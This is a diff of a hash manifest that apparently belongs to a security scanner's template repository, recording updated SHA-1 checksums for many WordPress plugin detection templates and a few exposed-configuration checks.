+helpers/wordpress/plugins/wordpress-seo.txt:930e8b88830c61ff86b6e414b42dfa304520f47e helpers/wordpress/plugins/worker.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/wp-crontrol.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/wp-fastest-cache.txt:2e3c1317d99e9b751581574ebe5b0f4a32eea831 @@ -942,9 +942,9 @@ helpers/wordpress/plugins/wp-multibyte-patch.txt:01fa77eedfbdd7455e8cf0cf239a4de helpers/wordpress/plugins/wp-optimize.txt:fbc954f986ea78ee55f14e1ee288f60983e46fb5 helpers/wordpress/plugins/wp-pagenavi.txt:53203701692767a1c2a24e47d94a090230bd8b3f helpers/wordpress/plugins/wp-reset.txt:0676d107698477ab3fa1a4f94a324657de0f87fd -helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt:d8c3854ca34a77499c02ddb33eac42b322bb70cb +helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt:4fde6b87a266eece4b77ee2df16db81507c218b0 helpers/wordpress/plugins/wp-rollback.txt:9900ba1358421f36ec71073f65f6a41eed98f7c2 -helpers/wordpress/plugins/wp-seopress.txt:14665694dff2d37ef9323cf70015fe0466bea9b2 +helpers/wordpress/plugins/wp-seopress.txt:db63fca627057d07dbd8d5064a623a9cd31006f9 helpers/wordpress/plugins/wp-sitemap-page.txt:b600bf3dacb5d620338f6412a343d3349ec570bf helpers/wordpress/plugins/wp-smushit.txt:c7f53e91bcbfae4c21042e9d0833d24ed2cfc08c helpers/wordpress/plugins/wp-statistics.txt:8547686c44d1287856fe952f839075580fe279ad @@ -4914,7 +4914,7 @@ http/exposures/configs/exposed-darcs.yaml:ded4549a0c601780ca5425f48ddabb47ca802b http/exposures/configs/exposed-gitignore.yaml:1227f8bcb56bbcdc32baf156eb6d21ac06383c6b http/exposures/configs/exposed-hg.yaml:a88625c10530e2d9a7717cd4a2d4b0f7f35ab167 http/exposures/configs/exposed-sharepoint-list.yaml:912d3a0311062208cd6cc6d92a9b6456c2f653d2 -http/exposures/configs/exposed-svn.yaml:e4e592043b58dc56b690c62724dadd546cdd9831 +http/exposures/configs/exposed-svn.yaml:9860c2d3729973d863a375565f9dac48daa2cab9 http/exposures/configs/exposed-vscode.yaml:dbcb3ed67d0dff4e71076924fb318d2a5a7614f9 http/exposures/configs/filestash-admin-config.yaml:3f7ba25430b6b46c4f18c279aafd08b5025208fa http/exposures/configs/firebase-config-exposure.yaml:3fb8f306a1cc3f5741eb0ba1275d557471ce16ae @@ -7317,230 +7317,230 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:471e2f5b65827cd0534f4e42ee839a5529429cb4 -http/technologies/wordpress/plugins/add-to-any.yaml:ee21ec988aca4a426d38b4670cc157bee5396c48 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:283ebaaf95b4c1ed6c6bf9559115f863ee2f2700 +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:6e16ad203580da6ce3fa3d232d3149529f4e6117 -http/technologies/wordpress/plugins/akismet.yaml:b0d2cab5f44c4b6516c0ff972ad2b94ec5ecd68c +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c06da7b337ab8d0b96c37719c6ca2fb2674b4b6c -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:93b1e4088b1fbd2a706faa2dfe4adb11a768748f -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:297c443c69434128832bab1f192981716d0709f7 -http/technologies/wordpress/plugins/amp.yaml:86b1b4141fec07714ba2f3bdd43e7e6a823795f0 -http/technologies/wordpress/plugins/antispam-bee.yaml:94609a86e5382690014ad032cc9b9ada301a4535 -http/technologies/wordpress/plugins/astra-sites.yaml:87a0e262a216d7c80d9f66ab8cac38303fcff66f +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:ca6164fc2f77a2f245d569d3e7f7a4957ff601be -http/technologies/wordpress/plugins/backwpup.yaml:1ad7199d5d8aa303a032eab557a9c51ad56edf0b -http/technologies/wordpress/plugins/better-search-replace.yaml:2e6777dd855e66114818bee7bbbf57d00f52ef52 -http/technologies/wordpress/plugins/better-wp-security.yaml:ae74a705ab72e3eef0f57ebf493fc00c02048c12 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:61ec9833a36bb80896d9631916c67ec7d19ea55f -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:05b81447620750872fb10b224cfc846bf53b8563 -http/technologies/wordpress/plugins/breeze.yaml:76928160c448edf67323c7cc1926775c8368e310 -http/technologies/wordpress/plugins/broken-link-checker.yaml:97b5b1ccd2087e67c3e0916dc03665b427298778 -http/technologies/wordpress/plugins/chaty.yaml:e5aa343b5f93ba7897885505f848415d4f0ef0ba -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5786d982f7f890ba426f015644c495089978ab18 -http/technologies/wordpress/plugins/classic-editor.yaml:4fbb338d7104e5daba4d7559b431ef5f9651df0b -http/technologies/wordpress/plugins/classic-widgets.yaml:e5f7f7cf2a54133bf97ac29cdbde54c60788c31f -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:fb2429d1886b9e01595b8aeeac5157ee44cf0fc5 +http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 +http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 +http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 +http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 +http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 +http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba +http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d +http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 +http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:1cb248b8c080ad7976dc04a2d080711342a47c99 -http/technologies/wordpress/plugins/coblocks.yaml:95f0b7388558c5379093c1fecbe4af87ef1f332f -http/technologies/wordpress/plugins/code-snippets.yaml:ad4348ce5c23b5afd07b9ea8470aaeb9a6440fae -http/technologies/wordpress/plugins/coming-soon.yaml:a0a6628a74c028fcfdc24a7ed71768e35b391d2e -http/technologies/wordpress/plugins/complianz-gdpr.yaml:ce2b7073b7f1ac8881d1a12281ab93b65a119713 -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:c74f7cb2d5328d8575371cc7a639887405998170 -http/technologies/wordpress/plugins/contact-form-7.yaml:fb21904525cc325db2169fdf3e468fea7d49fa8f -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:f942b181d8a18ec9132301b6e64526eea823fef4 -http/technologies/wordpress/plugins/cookie-law-info.yaml:c6d9912c32655f63408125a936361f038fcde030 -http/technologies/wordpress/plugins/cookie-notice.yaml:0c55b84bfd433d4f1f1b54d1a065b7292f51c8de -http/technologies/wordpress/plugins/copy-delete-posts.yaml:e1cf3ce8f28d872ee43fc7b0ec8774ecea81e2ff -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:e10f29d3b77915d0a70a36ada289aa8f4ca5c432 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:c2d2858f6dd74b5b2d95868e8d8e10b5a79c14d8 -http/technologies/wordpress/plugins/custom-css-js.yaml:1c7e125af54203e3c583f24b4e11c96f9928b53c -http/technologies/wordpress/plugins/custom-fonts.yaml:1518082274355f215299e3d7d2b7289ff1c0d8de -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:c3389f02e457e388d18d96c0454a84d4a71d47cf -http/technologies/wordpress/plugins/disable-comments.yaml:57d3bb339a8d5b7a5c4379737301eddfd8f434a8 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:26c339b6fcf609e68332f5ea078744d6d0927347 -http/technologies/wordpress/plugins/duplicate-page.yaml:7e6643590eeaf2289f36bed264c65cf7fbfb0425 -http/technologies/wordpress/plugins/duplicate-post.yaml:1eda904fd3661b388cf8c53da97ebf39dae2fb34 -http/technologies/wordpress/plugins/duplicator.yaml:ce1e8ee1e296c6061508b1bf0b6483d4b5f5baf6 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:4ae8746463ea24cee8350e59d73bf932aa75f8f5 +http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 +http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d +http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c +http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d +http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 +http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 +http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c +http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 +http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 +http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 +http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e +http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:4b912fbfdb21a9036b88d3826d9bd04ab0cc69f8 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:b3abc6765d3266b7b6ec064a8dca8acc70ffa7dd -http/technologies/wordpress/plugins/elementor.yaml:636815a0c1eb971dfdd1189ca46417dac622ba80 -http/technologies/wordpress/plugins/elementskit-lite.yaml:e2f477693864f019a8ae82940c404bc013fca04a -http/technologies/wordpress/plugins/enable-media-replace.yaml:5912dc7f30e94e8d0ad876a267501b65c0adb97e -http/technologies/wordpress/plugins/envato-elements.yaml:fa8d1858e1af093e77151cf884391857ef3f4a13 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:2dabe450bf64107bb27fdadd4e28808afc8eaae0 -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:3f34665056fef3cb0da96f059f6c4bcb1a2dd517 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:7d5f8602b1d83bc7c020d8b25d41c0f8883b2e79 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:42bf3f97c31c48fb0e9fb10c2b3f127a4e09a5f7 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:a3a0dd7fd567764cb7fa924100c76e680ee20276 -http/technologies/wordpress/plugins/flamingo.yaml:851efe3e25cc5717d3348cc3f8a1f8cd658734bb -http/technologies/wordpress/plugins/fluent-smtp.yaml:b951fb56027053b0ca1936cdadcf6e6b8ee632a8 -http/technologies/wordpress/plugins/fluentform.yaml:653237cae559d654921b429ebcaa8a45ac7f2894 -http/technologies/wordpress/plugins/font-awesome.yaml:b2582e5968d65373cdf2c8664fc4aec01120c70e -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:02e6b8135b515f6f1b089f896b9bf8f8afa5d889 -http/technologies/wordpress/plugins/formidable.yaml:87d9465edd371b6f2f5eadc912e13efed7311d7a -http/technologies/wordpress/plugins/forminator.yaml:fb45f7c3d9bb7bb8d504bf793aa91f61ddcb72cf -http/technologies/wordpress/plugins/ga-google-analytics.yaml:42ba92e278e7e52102e7a6a366ad30dd8eebe6e5 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:2618e309b9b61611b838ebcf6cc9d00e60e93a67 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:782571dd07b76c404f8f7f7562259521277441f3 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:eb8df8856259573a11ec8ad31325b46734a44998 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:999c4af5f995f72e39fa64bc49cf5afe4723a2dc -http/technologies/wordpress/plugins/google-site-kit.yaml:0d70dd126e1cec7a85d9eb423531d74443710b85 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:43aada0ae4222137c38a414f73fa37c7c225f890 -http/technologies/wordpress/plugins/gtranslate.yaml:14c6ebaf6245811d5a612eb3f22c1ec89e0ca56a -http/technologies/wordpress/plugins/gutenberg.yaml:cf698abdcc238123420ccb78438ee8931d5ad120 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:48df01ad9f1eb8ca12f5288766b2a817f13479dc +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 +http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 +http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 +http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d +http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc +http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 +http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 +http/technologies/wordpress/plugins/fluent-smtp.yaml:f8756f30bfdc614abb6aa0cef6f395e5a96615d8 +http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 +http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e +http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 +http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa +http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 +http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 +http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:f8d07a36499862bbef67903105e1be02b072d37a -http/technologies/wordpress/plugins/header-footer-elementor.yaml:abc775b01ad66cfe92769231892b32c6fc4ed661 -http/technologies/wordpress/plugins/header-footer.yaml:dc1aaed33744b8388fdc664bacf0bf891ca60055 -http/technologies/wordpress/plugins/health-check.yaml:2f432908267370cf97d7c632fa6ce89cc10a4f66 -http/technologies/wordpress/plugins/hello-dolly.yaml:381cd1a04c2986c7d647c50ff522dc30fca007a7 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:5f75cc78032394b7161466ef23e81a388caa650d -http/technologies/wordpress/plugins/hostinger.yaml:35332836dfb92727887f3770e5237f5f3fddcd66 -http/technologies/wordpress/plugins/image-optimization.yaml:ced096cbce8d863a7cf147642b0510d9e0ea5052 -http/technologies/wordpress/plugins/imagify.yaml:a3bde87ef2d269952c27eba078611a15450fe044 -http/technologies/wordpress/plugins/imsanity.yaml:1195d3a79b8e9b6a2de32a30afad88f72a9132fe -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:6cb9537a88653f6f8c437b5ea5c65c8fe7049809 -http/technologies/wordpress/plugins/instagram-feed.yaml:bb5821d64e61b7d965223527d9e167c2600c8227 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:0bf67b3d5cc7ca4318df6fb50d29de3d18ae33f5 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d +http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf +http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 +http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 +http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 +http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 +http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff +http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 +http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:512336d0f0c76489a093451a218fc16e2218416c -http/technologies/wordpress/plugins/jetpack.yaml:b3733ab3fdc7ec300589cc4cf3a4ac17ca714db9 -http/technologies/wordpress/plugins/kadence-blocks.yaml:1ca5f884b21283f10e83436476cf96ab009a605e -http/technologies/wordpress/plugins/kirki.yaml:96cbbaa1e1f4355bc2fd1abceb807507f8456f86 -http/technologies/wordpress/plugins/leadin.yaml:bbd0a6560836dd2fb4080ce1dd3464448f673871 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:11053a41343bbd9a4af95d1346e7cc9c6f9ec6e0 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:a3c632178f635a99a00547c7a3ecb7b6dbb63c7b -http/technologies/wordpress/plugins/litespeed-cache.yaml:fdd79c33103a4553fe02eb41a205bbbad98dca4d -http/technologies/wordpress/plugins/loco-translate.yaml:a6dd1db28267410669a925d7f6a9567861dd0ce0 -http/technologies/wordpress/plugins/loginizer.yaml:6e5aa52d49284bc85de3a3ba57dd7ec3c9934b90 +http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f +http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 +http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a +http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc +http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c +http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 +http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 +http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:1b86ea0806bf00b4adf33640095b93448702c03a -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:7213fa9e85a7f641f25880b4ea27a735078c38aa -http/technologies/wordpress/plugins/mailpoet.yaml:3c39e584a7eec396dd32007e6011b62ccc8da9d3 -http/technologies/wordpress/plugins/maintenance.yaml:6c5c622e0f3cf24147d9d6a348bbaa0ea3fc9117 -http/technologies/wordpress/plugins/mainwp-child.yaml:1a861f0e3e7feafffdbb4796f22c34636faa07aa -http/technologies/wordpress/plugins/malcare-security.yaml:ada3688aeceab8ceb827baad31e78a6c2b73f08d -http/technologies/wordpress/plugins/megamenu.yaml:1ebee29b8cd3455cb87ece53269e43e935af9d97 -http/technologies/wordpress/plugins/members.yaml:d2fd6fd30bdae6ae744a6556241563075b73c011 -http/technologies/wordpress/plugins/meta-box.yaml:0523f28bebb233a734477ef3c0a259e52875a237 -http/technologies/wordpress/plugins/metform.yaml:430f7fa5e6bc2645b943b95d2b6b201ac2c321fb -http/technologies/wordpress/plugins/ml-slider.yaml:ef551a29a90a00e438773d14dc7f3f7eec699c2f -http/technologies/wordpress/plugins/newsletter.yaml:cfca9d671346d8cc81750bf14a659aaacf45a91c -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:77056038e5bb296d8da2554d05386e332f7dbb10 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:dc63b180ae81bb279042b4e991478f3764be816e -http/technologies/wordpress/plugins/ninja-forms.yaml:4bade33dfd6a5866a03348f0484914340aaa09cd -http/technologies/wordpress/plugins/ocean-extra.yaml:1874e6b0db08efac2af4554ff481ec7de44b37ad -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:d9e313bd63e35e596bedca4caa38eaab1da26c06 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:686909a5252995a710ad14401eebc6fb846304a4 -http/technologies/wordpress/plugins/optinmonster.yaml:97beac2da76d821ef91f9fbd68fe9e58529781ea -http/technologies/wordpress/plugins/otter-blocks.yaml:81000e41897bc6e3905af7a4330105a640dd4df4 -http/technologies/wordpress/plugins/password-protected.yaml:816c3601a17d030022539dbeae0645455af0c2e7 -http/technologies/wordpress/plugins/pdf-embedder.yaml:b41fd685244bf00bb9e5051b3c1543e75db1cb3f +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec +http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 +http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 +http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 +http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 +http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 +http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 +http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 +http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e +http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 +http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d +http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 +http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 +http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 +http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 +http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 +http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 